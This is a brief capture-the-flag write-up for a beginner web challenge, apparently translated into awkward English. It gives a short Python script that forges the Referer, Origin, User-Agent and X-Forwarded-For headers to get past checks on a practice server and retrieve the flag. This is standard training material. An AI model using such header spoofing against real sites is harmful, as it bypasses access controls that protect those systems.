View page source, found a file secret.php.
secret.php reads as follows:
Requirements must enter a page from https://www.Sycsecret.com, using python add headers to access.
import requests
url = 'http://861-fd096d07-6da8-4c2d-9959-15792888b57.enode3.buuoj.cn:25828/Secret.php'
headers={"Referer":"https://www.Sycsecret.com","Origin":"https://www.Sycsecret.com"}
r = requests.get(url,headers=headers)
print(r.text)
The results showed Please use "Syclover" browser.
Continue to add the User-Agent headers inside
headers['User-Agent'] = "Syclover"
Continue to visit, get No !!! you can only read this locally !!!
Should be to forge IP, add X-Forwarded-For headers inside the
headers['X-Forwarded-For'] = '127.0.0.1'
Get flag.
Feeling, geek title challenge for the novice friendly, geeks do challenge the title if returned just learning the CTF.